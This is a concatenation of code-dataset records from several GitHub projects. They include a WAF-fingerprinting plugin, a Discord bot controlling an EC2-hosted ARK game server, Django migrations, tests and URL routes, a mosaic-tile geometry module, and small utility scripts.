'ukch_pop_1refv.csv'\noutput_file = 'ukch_pop_1refv2.csv'\nwith open(input_file, newline='') as csvfile:\n reader = csv.DictReader(csvfile)\n for row in reader:\n if fieldnames==[]:\n fieldnames=list(row.keys())\n if row['Include'] =='':\n print(\"Adding\", row['Title'], row['DOI'])\n catalysis_articles[int(row['Num'])]=row\n \nfor cat_art_num in catalysis_articles.keys():\n if catalysis_articles[cat_art_num]['DOI'] != \"\":\n article_title = catalysis_articles[cat_art_num]['Title']\n doi_text = catalysis_articles[cat_art_num]['DOI']\n article_data = getCrossRefBibData(doi_text)\n if 'link' in article_data.keys():\n url = jsonToPlainText(article_data['link'])\n txt=findURIFrag(url,[\"acknowle\"],\"catalysis\")\n print(cat_art_num,\"|\",url,\"|\", txt)\n break\n \n\n\n","repo_name":"scman1/validatearticledata","sub_path":"scripts/findCHRefCRDOI.py","file_name":"findCHRefCRDOI.py","file_ext":"py","file_size_in_byte":2712,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"70541913899","text":"import re\n\n\n__product__ = \"Chuangyu top government cloud defense platform (WAF)\"\n\n\ndef detect(content, **kwargs):\n content = str(content)\n detection_schema = (\n re.compile(r\"(http(s)?.//(www.)?)?365cyd.(com|net)\", re.I),\n )\n for detection in detection_schema:\n if detection.search(content) is not None:\n return True\n","repo_name":"Ekultek/WhatWaf","sub_path":"content/plugins/chuangyu.py","file_name":"chuangyu.py","file_ext":"py","file_size_in_byte":353,"program_lang":"python","lang":"en","doc_type":"code","stars":2401,"dataset":"github-code","pt":"92"} +{"seq_id":"8123178471","text":"from ast import Try\nimport asyncio\nfrom secrets import choice\nfrom typing import Optional\nfrom webbrowser import get\nimport discord\nimport requests\nfrom discord import app_commands\nfrom discord.app_commands import Choice\nfrom discord.ui import View, Button\nfrom rcon.source import Client, rcon\nfrom discord.ext import tasks\nimport os\nfrom dotenv import load_dotenv \n\nimport ec2_control\n\nMY_GUILD = discord.Object(id=1021758457818394664) # replace with your guild id\n\nload_dotenv()\nTOKEN = os.getenv('TOKEN')\nPASS = os.getenv('PASS')\nIP = os.getenv('IP')\n\nclass MyClient(discord.Client):\n def __init__(self, *, intents: discord.Intents):\n super().__init__(intents=intents)\n # A CommandTree is a special type that holds all the application command\n # state required to make it work. This is a separate class because it\n # allows all the extra state to be opt-in.\n # Whenever you want to work with application commands, your tree is used\n # to store and work with them.\n # Note: When using commands.Bot instead of discord.Client, the bot will\n # maintain its own tree instead.\n self.tree = app_commands.CommandTree(self)\n\n # In this basic example, we just synchronize the app commands to one guild.\n # Instead of specifying a guild to every command, we copy over our global commands instead.\n # By doing so, we don't have to wait up to an hour until they are shown to the end-user.\n async def setup_hook(self):\n # This copies the global commands over to your guild.\n self.tree.copy_global_to(guild=MY_GUILD)\n await self.tree.sync(guild=MY_GUILD)\n\n\nintents = discord.Intents.default()\nclient = MyClient(intents=intents)\n\ngreentick = \"<:greentick:1023396034363281428>\"\nredx = \"<:redx:1023396035625758770>\"\n\n@client.event\nasync def on_ready():\n update_channel.start()\n print(f'Logged in as {client.user} (ID: {client.user.id})')\n print('------')\n\n# start command\n@client.tree.command(name='start', description='Startuje serwer, wymaga specjalnej roli.')\nasync def start(interaction: discord.Interaction):\n # CHANNEL CHECK\n if interaction.channel.id != 1024078298147471443:\n await interaction.response.send_message('❌ Komenda działa tylko w kanale <#1021758531956899950>!', ephemeral=True)\n return\n\n # ROLE CHECK\n if discord.utils.get(interaction.user.roles, id=1021759370205339669) is None:\n embedVar = discord.Embed(title=\"Błąd\", description=f\"{redx} Nie masz prawidłowych roli, aby użyć tej komendy!\", color=0xff0000)\n await interaction.response.send_message(embed=embedVar, ephemeral=True)\n return\n\n if ec2_control.instance_status(\"i-0f5911636a9843859\") == 'running':\n embedVar = discord.Embed(title=f\"{greentick} Serwer już chodzi\", description=f\"{redx} Serwer już chodzi! Spróbuj dołączyć, a jeśli są problemy to wyłącz i włącz serwer.\", color=0x00ff00)\n await interaction.response.send_message(embed=embedVar, ephemeral=True)\n return\n try:\n ec2_control.start_instance('i-0f5911636a9843859')\n except Exception as e:\n embedVar = discord.Embed(title=f\"{redx} Błąd\", description=f\"{redx} Wystąpił błąd podczas uruchamiania serwera. Spróbuj ponownie później.\", color=0xff0000)\n await interaction.response.send_message(embed=embedVar, ephemeral=True)\n print(f\"ERROR: {e}\")\n return\n embedVar = discord.Embed(title=f\"{greentick} Włączono Serwer\", description=\"Maszyna startowała. Proszę parę minut poczekać zanim się serwer ARK uruchomi. Możesz sprawdzić czy jest uruchomiony za pomocą `/status`.\", color=0x00ff00)\n # create a button that does /server status\n await interaction.response.send_message(embed=embedVar)\n print(f'{interaction.user} uruchomił serwer!')\n\n# stop command\n@client.tree.command(name='stop', description='Wyłącza serwer, wymaga specjalnej roli.')\nasync def stop(interaction: discord.Interaction):\n # CHANNEL CHECK\n if interaction.channel.id != 1024078298147471443:\n await interaction.response.send_message('❌ Komenda działa tylko w kanale <#1021758531956899950>!', ephemeral=True)\n return\n\n # ROLE CHECK\n if discord.utils.get(interaction.user.roles, id=1021759370205339669) is None:\n embedVar = discord.Embed(title=\"Error\", description=f\"{redx} Nie masz prawidłowych roli, aby użyć tej komendy!\", color=0xff0000)\n await interaction.response.send_message(embed=embedVar, ephemeral=True)\n return\n\n # STOPPED CHECK\n if ec2_control.instance_status('i-0f5911636a9843859') == 'stopped':\n embedVar = discord.Embed(title=f\"{redx} Serwer już jest wyłączony!\", description=\"Serwer już jest wyłączony! Jeśli chcesz zagrać na nim to włącz serwer za pomocą `/start`.\", color=0xff0000)\n await interaction.response.send_message(embed=embedVar, ephemeral=True)\n return\n\n # PLAYER CHECK\n players = await rcon(\n 'ListPlayers',\n host=IP, port=27020, passwd=PASS\n )\n # if no players are online, the response starts with the letter N\n if players[0] == 'N':\n playercount = '0'\n else:\n players = players.split('\\n')\n players = players[:-1]\n playercount = len(players)\n if playercount != '0':\n embedVar = discord.Embed(title=f\"{redx} Błąd\", description=f\"{redx} Na serwerze jest {playercount} graczy. Wyłącz serwer, gdy wszyscy gracze opuszczą serwer.\", color=0xff0000)\n await interaction.response.send_message(embed=embedVar, ephemeral=True)\n\n\n ec2_control.stop_instance('i-0f5911636a9843859')\n embedVar = discord.Embed(title=f\"{redx} Serwer Zatrzymany\", description=\"Maszyna została zatrzymana. Serwer ARK powinien się zapisać i wyłączyć. Możesz go ponownie uruchomić za pomocą `/start`.\", color=0xff0000)\n await interaction.response.send_message(embed=embedVar)\n print(f'{interaction.user} zatrzymał serwer!')\n\n# status command\n@client.tree.command(name='status', description='Sprawdza status serwera.')\nasync def status(interaction: discord.Interaction):\n # CHANNEL CHECK\n if interaction.channel.id != 1024078298147471443:\n await interaction.response.send_message('❌ Komenda działa tylko w kanale <#1021758531956899950>!', ephemeral=True)\n return\n\n awsserver = ec2_control.instance_status(\"i-0f5911636a9843859\")\n if awsserver == 'running':\n awsserver = f'{greentick} Online'\n elif awsserver == 'stopped':\n awsserver = f'{redx} Offline'\n elif awsserver == 'pending':\n awsserver = '⏳ Uruchamianie'\n elif awsserver == 'shutting-down' or 'stopping':\n awsserver = '⏳ Zatrzymywanie'\n else:\n print(f'Nieznany status: {awsserver}')\n awsserver = '❓ Nieznany'\n r = requests.get(f'http://api.steampowered.com/ISteamApps/GetServersAtAddress/v0001?addr={IP}:27015&format=json')\n\n # IF THE SERVER IS OFFLINE\n if r.json()['response']['servers'] == []:\n arkserver = f'{redx} Offline'\n playercount = '❓ Offline'\n\n # IF THE SERVER IS ONLINE\n elif r.json()['response']['servers'][0]['gamedir'] == 'ark_survival_evolved':\n arkserver = f'{greentick} Online'\n players = await rcon(\n 'ListPlayers',\n host=IP, port=27020, passwd=PASS\n )\n # if no players are online, the response starts with the letter N\n if players[0] == 'N':\n playercount = '0'\n else:\n players = players.split('\\n')\n players = players[:-1]\n playercount = len(players)\n\n # IF SOMETHING IS FUCKED UP\n else:\n arkserver = '❓ Error'\n playercount = '❓ Error'\n\n embedVar = discord.Embed(title=\"📊 Status Serwera\", description=\"Status maszyny oraz serwera ARK.\", color=0x053552)\n embedVar.add_field(name=\"Maszyna\", value=awsserver, inline=False)\n embedVar.add_field(name=\"Serwer ARK\", value=arkserver, inline=False)\n if playercount != '❓ Offline':\n embedVar.add_field(name=\"Gracze\", value=f\"{playercount}\", inline=False)\n await interaction.response.send_message(embed=embedVar, ephemeral=True)\n return\n\n# IP command\n@client.tree.command(name='ip', description='Pokazuje IP serwera.')\nasync def ip(interaction: discord.Interaction):\n # CHANNEL CHECK\n if interaction.channel.id != 1024078298147471443:\n await interaction.response.send_message('❌ Komenda działa tylko w kanale <#1021758531956899950>!', ephemeral=True)\n return\n\n ip = ec2_control.get_elastic_ip('i-0f5911636a9843859')\n embedVar = discord.Embed(title=\"🌐 IP Serwera\", description=\"Jeśli chcesz połączyć się bezpośrednio do serwera (za pomocą server list w steamie) to połącz się do tego IP\", color=0xFFD0A0)\n embedVar.add_field(name=\"IP\", value=f\"`{ip}`\", inline=True)\n embedVar.add_field(name=\"Port\", value=\"`27015`\", inline=True)\n await interaction.response.send_message(embed=embedVar, ephemeral=True)\n return\n\n@client.tree.command(name='forcestop', description='Wymusza zatrzymanie serwera.')\nasync def forcestop(interaction: discord.Interaction):\n # CHANNEL CHECK\n if interaction.channel.id != 1024078298147471443:\n await interaction.response.send_message('❌ Komenda działa tylko w kanale <#1021758531956899950>!', ephemeral=True)\n return\n\n # ADMIN CHECK\n if discord.utils.get(interaction.user.roles, id=1022625217656410152) is None:\n await interaction.response.send_message('❌ Nie jesteś administratorem!', ephemeral=True)\n return\n\n # STOPPED CHECK\n if ec2_control.instance_status('i-0f5911636a9843859') == 'stopped':\n embedVar = discord.Embed(title=f\"{redx} Serwer już jest wyłączony!\", description=\"Serwer już jest wyłączony! Jeśli chcesz zagrać na nim to włącz serwer za pomocą `/start`.\", color=0xff0000)\n await interaction.response.send_message(embed=embedVar, ephemeral=True)\n return\n\n ec2_control.stop_instance('i-0f5911636a9843859')\n embedVar = discord.Embed(title=f\"{redx} Serwer Zatrzymany\", description=\"Maszyna została wymuszono zatrzymana. Serwer ARK powinien się zapisać i wyłączyć. Możesz go ponownie uruchomić za pomocą `/start`.\", color=0xff0000)\n await interaction.response.send_message(embed=embedVar)\n print(f'{interaction.user} wymuszowo zatrzymał serwer!')\n\n# Update channel status name every 5 minutes\n@tasks.loop(minutes=5)\nasync def update_channel():\n r = requests.get(f'http://api.steampowered.com/ISteamApps/GetServersAtAddress/v0001?addr={IP}:27015&format=json')\n # If there is no data in server list, the server is offline\n if r.json()['response']['servers'] == []:\n status = f'OFFLINE'\n playercount = 'OFFLINE'\n elif r.json()['response']['servers'][0]['gamedir'] == 'ark_survival_evolved':\n status = f'ONLINE'\n players = await rcon(\n 'ListPlayers',\n host=IP, port=27020, passwd=PASS\n )\n # if no players are online, the response starts with the letter N\n if players[0] == 'N':\n playercount = '0'\n else:\n players = players.split('\\n')\n players = players[:-1]\n playercount = len(players)\n\n else:\n status = 'ERROR'\n\n channel = client.get_channel(1024317636697395241)\n if playercount == 'OFFLINE':\n await channel.edit(name=f'🔴 {status}')\n else:\n await channel.edit(name=f'🟢 {status} ({playercount})')\n\n# Delete messages in command only channel\n@client.event\nasync def on_message(message):\n if message.author == client.user:\n return\n if message.channel.id == 1024078298147471443:\n await message.delete()\n\nclient.run(TOKEN)","repo_name":"DuckyBlender/arkbot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":11727,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"197806324","text":"# Find the shortest distance among 2 given keys in a list.\n# suppose all keys >=0\n# Solution 1: Brutal O(M*N)\n# Solution 2: 2 pointer (sliding) O(M+N)\n# \n# # \n\n\nimport sys\n\nL=[3, 165, 90, 1, 88, 72, 33, 49, 3, 88, 111, 90]\nD=dict()\n\ndef solution(L, x, y):\n # build dict \n for i in range(len(L)):\n k = L[i]\n if k in D:\n D[k].append(i)\n else:\n D[k] = [i]\n #gap = getDistance(D, x, y)\n gap = getDistance2(D, x, y)\n print('-'*80)\n print(gap) \n\n\n# brutal force\ndef getDistance(d, a,b):\n if a not in d:\n return None\n if b not in d:\n return None\n \n gap = None\n for i in d[a]:\n for j in d[b]:\n g = abs(i-j)\n if not gap or g < gap:\n gap = g\n return gap\n\n# 'Slid and compare' (2 pointers)\n# <-list1 \n# list2->\ndef getDistance2(d, a,b):\n d1 = d[a]; \n # # d1.sort() # no need sort, the indexes are already in order due to the way we create the dict list\n d2 = d[b]; \n # d2.sort() # no need sort\n\n i = 0\n j = len(d2)-1\n mingap = sys.maxsize\n pregap = None \n flag = True\n while i=0 and j=0:\n gap = abs(d1[i] - d2[j])\n if gap < mingap:\n mingap = gap\n if flag:\n i += 1\n flag = False\n else:\n j -= 1\n flag = True\n print(pregap, gap, mingap)\n if pregap:\n if gap > pregap:\n break\n pregap = gap\n return mingap\n\n\nif __name__ == \"__main__\":\n solution(L, 3, 88)\n solution(L, 90, 88)\n\n","repo_name":"icoding2016/study","sub_path":"PY/free_exercise/min_gap_in_array.py","file_name":"min_gap_in_array.py","file_ext":"py","file_size_in_byte":1619,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"92"} +{"seq_id":"1092938715","text":"import time\nimport random\nfrom typing import List\nimport logging\nimport numpy as np\nfrom shapely.geometry import LineString, Polygon, MultiPoint\nfrom shapely.validation import make_valid\nfrom shapely import affinity\nfrom tqdm import tqdm\nimport matplotlib.pyplot as plt\nfrom matplotlib import patches\n\nlogger = logging.getLogger(\"__main__.\" + __name__)\n\nRAND_SIZE = 0.15 # portion of tile size which is added or removed randomly during construction\nMAX_ANGLE = 40 # 30...75 => max construction angle for tiles along roundings\n\n\nclass MosaicTiles:\n def __init__(self, config_parameters):\n self.config = config_parameters\n self.tile_size = config_parameters.tile_size\n self.tile_area = (self.tile_size) ** 2\n self.half_tile_size = self.tile_size // 2\n self.tile_size_tolerance = int(self.tile_size * RAND_SIZE)\n self.mosaic_height = 0\n self.mosaic_width = 0\n\n def place_tiles_along_guides(self, chains: List, angles: np.array, polygons: List = None) -> List:\n \"\"\"Creates polygons (tiles) along guides\n\n Parameters\n ----------\n chains : List\n List of guides containing the chains along which the tiles need to be placed.\n angles : np.array\n Numpy array of shape (height, width) containing the angles of the guidelines.\n polygons : List, optional\n List of existing polygons (default is None).\n\n Returns\n -------\n List\n List containing all the polygon objects that represent the tiles of a mosaic\n \"\"\"\n logger.info(f\"Placing tiles along {len(chains)} guidelines\")\n if polygons is None:\n polygons = []\n for chain in tqdm(chains):\n\n # consider existing polygons next to the new lane (reason: speed)\n search_area = LineString(np.array(chain)[:, ::-1]).buffer(2.1 * self.half_tile_size)\n preselected_nearby_polygons = [poly for poly in polygons if poly.intersects(search_area)]\n\n polygons = self.estimate_polygons_from_chain(chain, angles, polygons, preselected_nearby_polygons)\n\n return polygons\n\n def estimate_polygons_from_chain(\n self, list_of_points: List, angles: np.array, polygons: List, preselected_nearby_polygons: List\n ) -> List:\n \"\"\"Creates a list of polygons by iterating along the points of a chain\n\n Parameters\n ----------\n list_of_points : List\n List of points that create a chain.\n angles : np.array\n Numpy array of shape (height, width) containing the angles of the points.\n polygons : List\n List of existing polygons\n preselected_nearby_polygons : List\n List of polygons that are close to the point\n\n Returns\n -------\n List\n List containing the polygon objects for a chain\n \"\"\"\n for point_idx, point in enumerate(list_of_points):\n y_coord, x_coord = point\n angle = angles[y_coord, x_coord]\n\n if point_idx == 0: # at the beginning save the first side of the future polygon\n random_tile_size = self.tile_size + (self.tile_size_tolerance * random.choice([-1, 1]))\n point_idx_start = point_idx\n point_angle_start = angle\n line_start = self._get_line_from_coords(x_coord, y_coord, point_angle_start)\n\n chain_ready = self._check_if_chain_ready_for_polygon(\n point_idx, point_idx_start, list_of_points, point_angle_start, angles, random_tile_size\n )\n\n if chain_ready:\n line = self._get_line_from_coords(x_coord, y_coord, angle)\n\n polygons, preselected_nearby_polygons = self._add_polygon(\n line_start, line, polygons, preselected_nearby_polygons\n )\n\n line_start = line\n point_angle_start = angle\n point_idx_start = point_idx\n\n return polygons\n\n def _get_line_from_coords(self, x_coord: int, y_coord: int, angle: float):\n\n line = LineString([(x_coord, y_coord - self.half_tile_size), (x_coord, y_coord + self.half_tile_size)])\n line = affinity.rotate(line, -angle)\n\n return line\n\n @staticmethod\n def _check_if_chain_ready_for_polygon(\n point_idx: int,\n point_idx_start: int,\n chains: List,\n point_angle_start: float,\n angles: np.array,\n random_tile_size: int,\n ):\n # 1. end of point is reached\n if point_idx == len(chains) - 1:\n return True\n else:\n y_next, x_next = chains[point_idx + 1]\n angle_next_point = angles[y_next, x_next]\n angle_delta = angle_next_point - point_angle_start\n angle_delta = min(180 - abs(angle_delta), abs(angle_delta))\n # 2. with the NEXT point a large angle would be reached => draw now\n if angle_delta > MAX_ANGLE:\n return True\n # 3. goal width is reached\n if point_idx - point_idx_start == random_tile_size:\n return True\n return False\n\n def _add_polygon(\n self,\n line_start: LineString,\n current_line: LineString,\n polygons: List,\n preselected_nearby_polygons: List,\n ):\n\n # construct new tile\n polygon = MultiPoint(\n [line_start.coords[0], line_start.coords[1], current_line.coords[0], current_line.coords[1]]\n ).convex_hull\n\n # cut off areas that overlap with already existing tiles\n nearby_polygons = [\n poly for poly in preselected_nearby_polygons if polygon.buffer(0.02).disjoint(poly.buffer(0.02)) is False\n ]\n polygon = self._fit_in_polygon(polygon, nearby_polygons)\n\n # Sort out small tiles\n if polygon.area >= 0.08 * self.tile_area and polygon.geom_type == \"Polygon\" and polygon.is_valid:\n polygons += [polygon]\n preselected_nearby_polygons += [polygon]\n # self.plot_polygons(polygons)\n\n return polygons, preselected_nearby_polygons\n\n def _fit_in_polygon(self, polygon: Polygon, nearby_polygons: List):\n # Remove parts from polygon which overlap with existing ones:\n for p_there in nearby_polygons:\n polygon = polygon.difference(p_there)\n # only keep largest part if polygon consists of multiple fragments:\n if polygon.geom_type == \"MultiPolygon\":\n i_largest = np.argmax([p_i.area for p_i in polygon.geoms])\n polygon = polygon.geoms[i_largest]\n # remove pathologic polygons with holes (rare event):\n if polygon.type not in [\"MultiLineString\", \"LineString\", \"GeometryCollection\"]:\n if polygon.interiors: # check for attribute interiors if accessible\n polygon = Polygon(list(polygon.exterior.coords))\n\n return polygon\n\n def postprocess_polygons(self, polygons):\n\n logger.info(\"Posptrocessing mosaic\")\n # complete_polygons = self.cut_tiles_outside_frame(polygons)\n shrinked_polygons = self._irregular_shrink(polygons)\n repaired_polygons = self._repair_tiles(shrinked_polygons)\n reduced_polygons = self._reduce_edge_count(repaired_polygons)\n polygons = self._drop_small_tiles(reduced_polygons)\n\n return polygons\n\n def _irregular_shrink(self, polygons):\n polygons_shrinked = []\n for polygon in polygons:\n polygon = affinity.scale(polygon, xfact=random.uniform(0.85, 1), yfact=random.uniform(0.85, 1))\n polygon = polygon.buffer(-0.03 * self.half_tile_size)\n polygons_shrinked += [polygon]\n\n return polygons_shrinked\n\n def _repair_tiles(self, polygons):\n # remove or correct strange polygons\n polygons_new = []\n for polygon in polygons:\n if polygon.type == \"MultiPolygon\":\n for polygon_repaired in polygon.geoms:\n polygons_new += [polygon_repaired]\n else:\n polygons_new += [polygon]\n\n polygons_new2 = []\n for polygon in polygons_new:\n if polygon.exterior.type == \"LinearRing\":\n polygons_new2 += [polygon]\n\n return polygons_new2\n\n def _reduce_edge_count(self, polygons, tol=20):\n polygons_new = []\n for polygon in polygons:\n polygon = polygon.simplify(tolerance=self.half_tile_size / tol)\n polygons_new += [polygon]\n return polygons_new\n\n def _drop_small_tiles(self, polygons, threshold=0.03):\n polygons_new = []\n counter = 0\n for polygon in polygons:\n if polygon.area > threshold * self.tile_area:\n polygons_new += [polygon]\n else:\n counter += 1\n return polygons_new\n\n def cut_tiles_outside_frame(self, polygons):\n # remove parts of tiles which are outside of the actual image\n t_0 = time.time()\n outer = Polygon(\n [\n (-3 * self.half_tile_size, -3 * self.half_tile_size),\n (self.mosaic_width + 3 * self.half_tile_size, -3 * self.half_tile_size),\n (self.mosaic_width + 3 * self.half_tile_size, self.mosaic_height + 3 * self.half_tile_size),\n (-3 * self.half_tile_size, self.mosaic_height + 3 * self.half_tile_size),\n ],\n holes=[\n [\n (1, 1),\n (self.mosaic_height - 1, 1),\n (self.mosaic_height - 1, self.mosaic_width - 1),\n (1, self.mosaic_width - 1),\n ],\n ],\n )\n polygons_cut = []\n counter = 0\n for polygon in polygons:\n x_coord, y_coord = list(polygon.representative_point().coords)[0]\n if (\n y_coord < 4 * self.half_tile_size\n or y_coord > self.mosaic_height - 4 * self.half_tile_size\n or x_coord < 4 * self.half_tile_size\n or x_coord > self.mosaic_width - 4 * self.half_tile_size\n ):\n polygon = make_valid(polygon).difference(make_valid(outer)) # => if outside image borders\n counter += 1\n if polygon.area >= 0.05 * self.tile_area and polygon.geom_type == \"Polygon\":\n x_exterior, y_exterior = polygon.exterior.xy\n x_coords_in_range = [self.check_coords_in_range(coord, 0, self.mosaic_width) for coord in x_exterior]\n y_coords_in_range = [self.check_coords_in_range(coord, 0, self.mosaic_height) for coord in y_exterior]\n\n polygon_is_in_valid_area = np.all(y_coords_in_range, x_coords_in_range)\n\n if polygon_is_in_valid_area:\n polygons_cut += [polygon]\n logger.infof(\"Up to {counter} tiles beyond image borders were cut\", f\"{time.time()-t_0:.1f}s\")\n return polygons_cut\n\n @staticmethod\n def check_coords_in_range(coords, lower_bound, higher_bound):\n if lower_bound <= coords < higher_bound:\n return True\n return False\n\n def plot_polygons(self, polygons, colors=None, background=None):\n\n # Turn interactive plotting off\n plt.ioff()\n logger.info(\"Plotting polygons for mosaic\")\n fig, axes = plt.subplots(dpi=96, figsize=(self.config.mosaic_width / 2.54, self.config.mosaic_height / 2.54))\n plt.subplots_adjust(left=0, right=1, top=1, bottom=0)\n axes.invert_yaxis()\n axes.autoscale()\n axes.set_facecolor(\"darkslategray\")\n # ax.set_facecolor((1.0, 0.47, 0.42))\n\n for j, polygon in enumerate(tqdm(polygons)): # +\n\n if colors is not None:\n color = colors[j]\n edgecolor = \"black\"\n else:\n color = \"silver\"\n edgecolor = \"black\"\n\n corners = np.array(polygon.exterior.coords.xy).T\n tile = patches.Polygon(corners, edgecolor=edgecolor, lw=0.3, facecolor=color) # facecolor=color)\n axes.add_patch(tile)\n\n if background is not None:\n axes.set_facecolor(\"antiquewhite\")\n axes.margins(0)\n fig.canvas.draw()\n # plt.show()\n\n return fig\n","repo_name":"JavierCoronel/mosaic_generator","sub_path":"mosaic/mosaic_tiles.py","file_name":"mosaic_tiles.py","file_ext":"py","file_size_in_byte":12281,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"11902396961","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('article', '0007_article_clothing_style'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='article',\n name='clothing_style',\n field=models.CharField(default=b'PROFESSIONAL', max_length=12, choices=[(b'PROFESSIONAL', b'Professional'), (b'STREET', b'Street'), (b'PREP', b'Prep')]),\n ),\n ]\n","repo_name":"phil-a/TMC","sub_path":"django/django_test/article/migrations/0008_auto_20150428_0007.py","file_name":"0008_auto_20150428_0007.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"17299448872","text":"from .dependencies_imports import *\n\nproduct_payload: Dict[str, Any] = {\n 'name': 'some_product',\n 'description': 'description 1',\n 'unit_price': 1.0,\n 'stok': 10,\n 'image_url': None,\n 'offer': True,\n 'discount_rate': 10,\n}\n\n\nclass TestPublicCartItemsListView(APITestCase):\n\n def setUp(self):\n user = get_or_create_user(email='test@email.com', dni='12345678', password='testpassword')\n category = create_category(name='Test Category')\n product = create_product(category=category, **product_payload)\n self.cart = cart_models.Cart.objects.get(user=user)\n create_cart_item(cart=self.cart, product=product, ammount=1)\n self.url = get_cart_item_url('private_cart_items', user_id=user.id)\n self.client = APIClient()\n return super().setUp()\n\n def test_try_to_get_list_of_cart_items_without_authentication(self):\n \"\"\"\n Try to get a list of cart items without authentication.\n This operation should return a status code 401.\n \"\"\"\n response = self.client.get(self.url, format='json')\n self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)\n\n\nclass TestPrivateCartItemsListView(APITestCase):\n\n def setUp(self):\n user = get_or_create_user(email='test@email.com', dni='12345678', password='testpassword')\n category = create_category(name='Test Category')\n product = create_product(category=category, **product_payload)\n self.cart = cart_models.Cart.objects.get(user=user)\n create_cart_item(cart=self.cart, product=product, ammount=1)\n create_cart_item(cart=self.cart, product=product, ammount=2)\n self.url = get_cart_item_url('private_cart_items', user_id=user.id)\n self.client = APIClient()\n self.client.force_authenticate(user=user)\n return super().setUp()\n\n def test_get_list_of_cart_items(self):\n \"\"\"\n Get a list of cart items.\n This operation should return a status code 200 and a list of cart items.\n \"\"\"\n cart_items = cart_models.CartItem.objects.filter(cart=self.cart)\n response = self.client.get(self.url, format='json')\n data = response.json()\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(len(data['results']['items']), cart_items.count())\n self.assertEqual(data['results']['items'], serializers.CartItemSerializer(cart_items, many=True).data)\n","repo_name":"francomz92/store_drf","sub_path":"server/tests/shop/cart/cart_items/test_list_cart_items.py","file_name":"test_list_cart_items.py","file_ext":"py","file_size_in_byte":2399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"6162816687","text":"from django.contrib import admin\nfrom django.urls import path, include\n\nfrom . import views\n\nurlpatterns = [\n # Auth\n path('', views.user_admin_login, name=\"user_admin_login\"),\n path('logout/', views.user_admin_logout, name=\"user_admin_logout\"),\n path('edit-details/', views.view_admin_edit_form, name=\"view_admin_edit_form\"),\n path('edit/', views.edit_admin_details, name=\"edit_admin_details\"),\n\n # Reset password of admin\n path('reset-password/', views.admin_reset_password, name=\"admin_reset_password\"),\n\n\n\n path('home/', views.user_admin_home, name=\"user_admin_home\"),\n path(\"view-posts/\", views.view_posts, name=\"view_posts\"),\n \n # Search Orders & Download PDF\n path(\"search-orders/\", views.user_admin_search_orders, name=\"user_admin_search_orders\"),\n path(\"download-orders/\", views.download_order_to_pdf, name=\"download_order_to_pdf\"),\n\n # Search Marketer's Clients\n path(\"marketer/clients-search/\", views.search_marketers_clients, name=\"search_marketers_clients\"),\n\n # View Discount requests\n path(\"view-all-discount-requests/\", views.view_all_discount_requests, name=\"view_all_discount_requests\"),\n \n # View Gst Relax requests\n path(\"view-all-gst-relax-requests/\", views.view_all_gst_relax_requests, name=\"view_all_gst_relax_requests\"),\n\n\n # Search for Discount requests\n path(\"search-discount-requests/\", views.search_discount_requests, name=\"search_discount_requests\"),\n\n # Search for Gst Relax requests\n path(\"search-gst-relax-requests/\", views.search_gst_relax_requests, name=\"search_gst_relax_requests\"),\n \n\n # Allow/Reject Discount\n path(\"allow-discount-to-client/\", views.grant_discount_to_client, name=\"grant_discount_to_client\"),\n\n path(\"reject-discount-to-client/\", views.reject_discount_request, name=\"reject_discount_request\"),\n \n \n # Allow/Reject Gst Relax Request\n path(\"allow-gst-relax-to-client/\", views.accept_gst_relax_request, name=\"accept_gst_relax_request\"),\n path(\"reject-gst-relax-to-client/\", views.reject_gst_relax_request, name=\"reject_gst_relax_request\"),\n\n # path(\"reject-discount-to-client/\", views.reject_discount_request, name=\"reject_discount_request\"),\n]\n\nfrom django.conf import settings\nfrom django.conf.urls.static import static\nif settings.DEBUG:\n urlpatterns += static(settings.MEDIA_URL,\n document_root=settings.MEDIA_ROOT)\n urlpatterns += static(settings.STATIC_URL,\n document_root=settings.STATIC_ROOT)\n","repo_name":"vaishnavm1/ott_admanager","sub_path":"user_admin/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"37012145640","text":"import sys\r\nimport xml.etree.ElementTree as gfg # for xml creation\r\nimport gzip # gzipping .xml to .xopp\r\nimport PIL # for image manipulation\r\nfrom PIL import Image\r\nimport base64 # base 64 encoding\r\nfrom io import BytesIO # byte array\r\n\r\ndef pil2xopp(pil_images: list, xopp_path: str, poppler_path: str = None, \r\n max_width: int = None, max_height: int = None):\r\n \r\n # default hardcoded header\r\n root = gfg.Element(\"xournal\")\r\n root.set(\"creator\", \"Xournal++ 1.1.1\")\r\n root.set(\"fileversion\", \"4\")\r\n print(\"initilised xml for xopp\")\r\n \r\n for i,page in enumerate(pil_images):\r\n # Determine the page size (to keep the aspect ratio)\r\n xopp_page_width: float = 595.27559100 # default from xopp document\r\n xopp_page_height: float = xopp_page_width * float(page.size[1]/page.size[0])\r\n \r\n page_xml = gfg.SubElement(root, \"page\")\r\n page_xml.set(\"width\", str(xopp_page_width))\r\n page_xml.set(\"height\", str(xopp_page_height))\r\n\r\n # set a background (checked paper)\r\n bg_xml = gfg.SubElement(page_xml, \"background\")\r\n bg_xml.set(\"type\", \"solid\")\r\n bg_xml.set(\"color\", \"#ffffffff\")\r\n bg_xml.set(\"style\", \"graph\")\r\n \r\n # The image element is wrapped by a layer element\r\n layer_xml = gfg.SubElement(page_xml, \"layer\")\r\n \r\n img_xml = gfg.SubElement(layer_xml, \"image\")\r\n # That it fills the whole page (will not be strechted)\r\n img_xml.set(\"left\", \"0\")\r\n img_xml.set(\"top\", \"0\")\r\n img_xml.set(\"right\", 